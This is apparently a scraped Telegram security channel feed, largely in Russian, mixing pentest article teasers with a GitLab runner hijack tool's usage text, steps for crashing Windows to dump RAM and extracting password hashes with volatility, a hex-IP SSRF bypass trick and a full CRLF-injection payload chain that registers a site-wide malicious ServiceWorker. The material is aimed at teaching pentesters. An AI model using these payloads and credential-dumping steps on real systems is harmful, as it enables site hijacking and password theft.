Abusing GitLab Runners
#gitlab #devsecops
Не самая новая техника hijack'а других gitlab runner'ов, но тем не менее эффективная, если вы получаете доступ к gitlab и/или токен раннера. В этой статье автор хотел бы объяснить, что такое Runners, как они работают и как вы можете использовать их во время пентестов.
➡️ Research
➡️ Github PoC
Использование:
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#gitlab #devsecops
Не самая новая техника hijack'а других gitlab runner'ов, но тем не менее эффективная, если вы получаете доступ к gitlab и/или токен раннера. В этой статье автор хотел бы объяснить, что такое Runners, как они работают и как вы можете использовать их во время пентестов.
Использование:
usage: hijack-runner.py [-h] [--target TARGET] [--register REGISTER] [--attack ATTACK] [--tag TAG]
[--clone]
Abuse GitLab Runners
optional arguments:
-h, --help show this help message and exit
--target TARGET The GitLab instance to target
--register REGISTER Register a token
--attack ATTACK Use Runner token to steal data
--tag TAG Taglist separated with commas
--clone Will clone the repo locally
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍10
Forwarded from DefenseEvasion
This media is not supported in your browser
VIEW IN TELEGRAM
💀 Windows | Get passwords no one notices 🔑
- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)
🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
- So, be the root cause of BSoD — crash the system
🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate
3️⃣Launch volatility
⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP
> Read the full post (more techniques, nuances, detection, hardening)
#redteam #blueteam #credential_access
- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)
🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
C:\Windows\MEMORY.DMP file- So, be the root cause of BSoD — crash the system
🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate
C:\WIndows\MEMORY.DMP3️⃣Launch volatility
py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump
⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP
> Read the full post (more techniques, nuances, detection, hardening)
#redteam #blueteam #credential_access
👍9🌚3😁1
Forwarded from Я у мамы SecMemOps
This media is not supported in your browser
VIEW IN TELEGRAM
А какой сегодня ты?
🔥38😁16
🌚8
Forwarded from Telegram
Hello, this is Telegram Support.
bytescare.com made a complaint https://news.1rj.ru/str/poxek is infringing on their copyright.
We kindly ask you to contact the copyright holder via email abuse_team@bytescare.com to resolve the matter.
bytescare.com made a complaint https://news.1rj.ru/str/poxek is infringing on their copyright.
We kindly ask you to contact the copyright holder via email abuse_team@bytescare.com to resolve the matter.
Увеличиваем Attack Surface на пентесте периметра
#recon #разведка #хабр
Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник — это проблема. На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях нам, пентестерам, приходится recon-ить все ресурсы компании. Ну и конечно же, чем больше скоуп, тем больше Attack Surface, тем больше потенциальных файндингов, в итоге — больше вероятность пробива периметра.
❗️ Важный тезис - нет серебряной пули, который сделает разведку универсальной. Когда-нибудь вы наткнетесь на скоуп, который не будет поддаваться wildcard фильтрации или поддоменов пассивно не собирается, активно только брутить и вы в итоге много поддоменов пропустите и это НОРМАЛЬНО. Постройте базу для разведку, но всегда проходитесь руками
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#recon #разведка #хабр
Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник — это проблема. На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях нам, пентестерам, приходится recon-ить все ресурсы компании. Ну и конечно же, чем больше скоуп, тем больше Attack Surface, тем больше потенциальных файндингов, в итоге — больше вероятность пробива периметра.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Удобная подача списка url в shortscan по очереди
#shortscan #IIS #microsoft #заметка
P.S. в целом любую тулзу можно так завернуть, если разработчик не сделал функционал указания файла, как входных данных, а можно и PR ему отправить 😉
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#shortscan #IIS #microsoft #заметка
cat IIS.txt | xargs -I@ sh -c 'shortscan @'
P.S. в целом любую тулзу можно так завернуть, если разработчик не сделал функционал указания файла, как входных данных, а можно и PR ему отправить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6😁5
первая тысяча людей в чате)
Заходите, если не знали о чате ранее. Всегда активные беседы)
🌚 @poxek_chat
Заходите, если не знали о чате ранее. Всегда активные беседы)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18
Nuclei Fu
#nuclei #projectdiscovery #DAST
В сегодняшней статье речь пойдет о Nuclei — это мощный open-source инструмент для поиска уязвимостей (DAST), который активно развивается благодаря поддержке сообщества.
Доклад «Nuclei Fu» был впервые представлен экспертами СайберОК – Станиславом Савченко и Андреем Сикорским – на самой масштабной в Центральной Азии хакерской конференции KazHackStan, проходившей 11-13 сентября.
Посмотреть доклад: здесь
Посмотреть презентацию к докладу: здесь
За последний год в Nuclei было несколько крупных обновлений, которые принесли множество фич, таких как кодовая вставка, использование javanoscript в шаблонах, управление запросами через flow, внедрение подписи шаблонов и пр. Сегодня хотелось бы рассказать о возможных атаках на Nuclei, а именно о клиентских атаках, которые стали доступны благодаря этим нововведениям.
Далее рассказ буду вести в контексте двух сторон – Алисы, которая хочет защитить свой веб-сервер от сканирования Nuclei, и Боба, который, собственно, и запускает Nuclei.
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nuclei #projectdiscovery #DAST
В сегодняшней статье речь пойдет о Nuclei — это мощный open-source инструмент для поиска уязвимостей (DAST), который активно развивается благодаря поддержке сообщества.
Доклад «Nuclei Fu» был впервые представлен экспертами СайберОК – Станиславом Савченко и Андреем Сикорским – на самой масштабной в Центральной Азии хакерской конференции KazHackStan, проходившей 11-13 сентября.
Посмотреть доклад: здесь
Посмотреть презентацию к докладу: здесь
За последний год в Nuclei было несколько крупных обновлений, которые принесли множество фич, таких как кодовая вставка, использование javanoscript в шаблонах, управление запросами через flow, внедрение подписи шаблонов и пр. Сегодня хотелось бы рассказать о возможных атаках на Nuclei, а именно о клиентских атаках, которые стали доступны благодаря этим нововведениям.
Далее рассказ буду вести в контексте двух сторон – Алисы, которая хочет защитить свой веб-сервер от сканирования Nuclei, и Боба, который, собственно, и запускает Nuclei.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥5
Ключ от всех дверей: как нашли бэкдор в самых надежных* картах доступа
#nfc #rfid #СКУД
Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?
В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.
P.S. ребята старались писать статью, обязательно ставьте +rep
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nfc #rfid #СКУД
Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?
В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.
P.S. ребята старались писать статью, обязательно ставьте +rep
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22🔥5
#bugbounty #дляначинающих #meme
Эта статья основана на моем опыте веб-хакера, но описанные в ней принципы в целом применимы ко всем дисциплинам хакинга. В основном она предназначена для начинающих хакеров и для людей, которые уже нашли несколько багов, но хотят сделать свой подход к баг-баунти более последовательным и систематичным.
Об авторе: я Киаран (или Monke). Я ирландец, но живу в Эдинбурге. Занимаюсь баг-баунти уже примерно четыре года, участвовал в четырех мероприятиях Live Hacking Event на разных платформах, скоро будет пятое. Я довольно типичный веб-хакер, сейчас мне больше всего нравится заниматься хакингом на стороне клиента. В этом году я наконец полностью перешел на зарабатывание денег при помощи баг-баунти и основал компанию Simian Security. Возможно, я единственный ирландец, для которого баг-баунти является полноценной работой.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
IaC и DevSecOps: выбираем лучшие инструменты анализа и защиты инфраструктурного кода
#IaC #DevSecOps #appsec #безопаснаяразработка
Сегодня мы вновь будем говорить об особенностях статического сканирования, но на этот раз переключим фокус с программного кода на код инфраструктурный.
Частично этот вопрос обсуждался в статье про безопасность контейнеризированных приложений в DevSecOps. В этой статье будут рассмотрены краткие теоретические сведения о подходе “Инфрастуркутра как кодˮ, место безопасности IaC в цикле DevSecOps, методы статического анализа конфигурационных файлов и ключевые особенности работы с инструментом KICS.
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#IaC #DevSecOps #appsec #безопаснаяразработка
Сегодня мы вновь будем говорить об особенностях статического сканирования, но на этот раз переключим фокус с программного кода на код инфраструктурный.
Частично этот вопрос обсуждался в статье про безопасность контейнеризированных приложений в DevSecOps. В этой статье будут рассмотрены краткие теоретические сведения о подходе “Инфрастуркутра как кодˮ, место безопасности IaC в цикле DevSecOps, методы статического анализа конфигурационных файлов и ключевые особенности работы с инструментом KICS.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
Forwarded from BlackFan
Ну и раз я вспомнил что у меня есть Telegram канал - нужно запостить что-то полезное)
Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.
Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type
Используя CRLF Injection оба этих условия легко выполняются:
XSS
JS файл
Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.
То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.
Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope.
Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.
Для этого формируем код ServiceWorker с
И подключаем его через XSS.
Также иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.
Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.
Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type
Используя CRLF Injection оба этих условия легко выполняются:
XSS
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:20%0D%0A%0D%0A<noscript>XSS</noscript>
JS файл
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javanoscript%0D%0AContent-Length:7%0D%0A%0D%0AJS_file
Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.
То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.
Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope.
Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.
Для этого формируем код ServiceWorker с
Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.https://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javanoscript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})И подключаем его через XSS.
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cnoscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javanoscript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/noscript%3EТакже иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javanoscript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A
👍11
#k8s #kubernetes #контейнеры #container
Kubernetes сейчас массово используют в ЦОДах и облачных решениях. Какие заслуги у Кубера, что было до него и почему сейчас он едва ли не стандарт отрасли. А ещё, как понять, что Кубер вам ни к чему.
Сначала пятиминутка истории: как мы жили до появления Kubernetes. Когда-то серверные инфраструктуры основывались на концепции Bare Metal — физическом оборудовании, на котором выполнялись приложения. Такая архитектура позволяла чётко контролировать вычислительные ресурсы: количество ядер CPU, объём оперативной памяти и другие параметры можно было определять и наращивать напрямую, делая аппаратные апгрейды. Закон Мура работал на руку: рост производительности позволял постоянно повышать мощность без значительных затрат. При необходимости можно было создать настоящий кластер, объединяя серверы для эффективного распределения нагрузки и улучшенной работы с пользовательскими запросами.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
#merch #мерч #скидки #промокод
Собственно есть 2 новости, хорошая и очень хорошая)
1. Начнем с очень хорошей!)
Сегодня что-то много говорят про скидки какие-то, какое-то 11.11 и хоть с опозданием решил запрыгнуть в этот скидочный вагон и сделать вам подгон
Как вы могли догадаться, я подготовил для вас ПРОМОКОД на скидку в 10% на весь мерч в магазине
merchpoxeksale2. Сейчас в разработке новые единицы мерча. Будут использоваться новые футболки, которые я пока ещё тестирую.
Спойлер:
А пока оставляйте свои догадки, пожалания, запросы на какой-то мерч в комментариях с #merchrequest. Тогда я точно не пропущу ваш комментарий)
Да прибудет с вами RCE🔓
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍1
Практические варианты использования port knocking
#харденинг #ssh #ACL #fail2ban #администрирование
Существуют различные варианты попыток защиты\сокрытия сервисов от "любопытных глаз". Основные: использование нестандартного порта, fail2ban, ACL и tarpit (и их сочетание).
Есть ещё port knocking: как дополнительный фактор защиты - может снизить обнаружение сервиса, а не пытаться бороться с последствиями (брутфорс, эксплуатация), когда сервис уже обнаружен. Но, очень часто эта технология оказывается не используемой. Где-то из-за незнания технологии (хотя, статей хватает). Но, чаще из-за проблем на практике, которые мешают её внедрению:
➡️ Читать тута
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#харденинг #ssh #ACL #fail2ban #администрирование
Существуют различные варианты попыток защиты\сокрытия сервисов от "любопытных глаз". Основные: использование нестандартного порта, fail2ban, ACL и tarpit (и их сочетание).
Есть ещё port knocking: как дополнительный фактор защиты - может снизить обнаружение сервиса, а не пытаться бороться с последствиями (брутфорс, эксплуатация), когда сервис уже обнаружен. Но, очень часто эта технология оказывается не используемой. Где-то из-за незнания технологии (хотя, статей хватает). Но, чаще из-за проблем на практике, которые мешают её внедрению:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
От мышей на экране до zip-бомбы: топ приложений-шуток из начала нулевых
#дляолдов #meme
Сразу комментарий от меня: очень веселая статья, которые не оставит ни одного олда флешбеков)
Тогда он был действительно забавным местом, где каждый мог найти себе развлечение по вкусу. Было круто посмеяться над очередным flash-выпуском приключений «подруги космических туристов», пообщаться с друзьями в IRC или ICQ или скачать какой-нибудь «ускоритель интернета», оказывающийся в итоге банальным вирусом.
Подшутить над неопытными пользователями считалось вполне в порядке вещей, поэтому существовал целый пласт программ, которые эту задачу отлично выполняли. Пранки иногда носили массовый характер, особенно в компьютерных классах школ и техникумов. Сегодня предлагаю вспомнить, чем же можно было довести преподавателя и системного администратора до белого каления.
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#дляолдов #meme
Пришла пора признаться: я скучаю по интернету начала нулевых. © Антон Комаров "МТС Диджитал"
Тогда он был действительно забавным местом, где каждый мог найти себе развлечение по вкусу. Было круто посмеяться над очередным flash-выпуском приключений «подруги космических туристов», пообщаться с друзьями в IRC или ICQ или скачать какой-нибудь «ускоритель интернета», оказывающийся в итоге банальным вирусом.
Подшутить над неопытными пользователями считалось вполне в порядке вещей, поэтому существовал целый пласт программ, которые эту задачу отлично выполняли. Пранки иногда носили массовый характер, особенно в компьютерных классах школ и техникумов. Сегодня предлагаю вспомнить, чем же можно было довести преподавателя и системного администратора до белого каления.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
#dns #ssrf #bypass #hex
[ Оказалось способ древний, но я его увидел впервые :) ]
Все мы используем IPv4 ежедневно. Все мы используем IPv6 ежедневно. Но прямо сейчас меня удивил один парень из чата, открыв глаза, что браузер оказывается резолвит даже IP в Hex и Octal формате.
Hex IP — это представление IP-адреса в шестнадцатеричной системе. Обычно IP-адрес записывается в привычном формате с точками, например 192.168.0.1, где каждая часть — это десятичное значение байта (от 0 до 255). Однако этот же адрес можно представить в шестнадцатеричной системе.
Принцип работы:
IP-адрес состоит из 4 байтов, и каждый байт можно представить в шестнадцатеричном формате (от 00 до FF):
Десятичный IP 192.168.0.1 представлен в виде четырех байт: 192 (0xC0), 168 (0xA8), 0 (0x00), 1 (0x01).
Hex представление будет C0A801001.
Как преобразовать IP-адрес в шестнадцатеричный формат:
Возьмите каждый октет IP-адреса и переведите его в шестнадцатеричную систему.
Объедините эти значения в строку без точек.
Если вы введете URL вида http://0xC0A80001, браузер или сервер может интерпретировать это как запрос на http://192.168.0.1.
Для удобной конвертации можете использовать следующую команду:
printf '%02X' 192 168 0 1 ; echo
Получете следующий вывод:
C0A80001, подставляем 0x - hex кодhttp://0xC0A80001 и вау, оно срабатывает Собственно коллега по работе (это про тебя Андрей)), что это можно использовать при тестировании SSRF. Дальше сами фантазируйте)
Удивите и своих коллег, поделившись постом 🌝
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡17🔥11😁8🌚1